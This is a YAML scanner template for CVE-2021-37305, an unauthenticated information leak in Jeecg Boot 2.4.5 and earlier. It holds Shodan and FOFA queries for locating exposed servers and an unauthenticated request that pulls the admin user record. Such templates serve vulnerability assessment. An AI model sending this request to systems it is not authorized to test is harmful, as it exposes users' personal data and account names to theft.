id: CVE-2021-37305

info:
  name: Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure
  author: ritikchaddha
  severity: high
  verified: true
  description: |
    Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.
    SHODAN: title:"Jeecg-Boot"
    FOFA: title="JeecgBoot 企业级低代码平台"
  reference:
    - https://github.com/jeecgboot/jeecg-boot/issues/2794
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37305
  tags: cve,cve2021,jeecg,exposure
  created: 2023/06/16

rules:
  r0:
    request:
      method: GET
      path: /jeecg-boot/sys/user/querySysUser?username=admin
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'username":"admin') &&
      response.body.bcontains(b'success":true') &&
      response.body.bcontains(b'result":{')
expression: r0()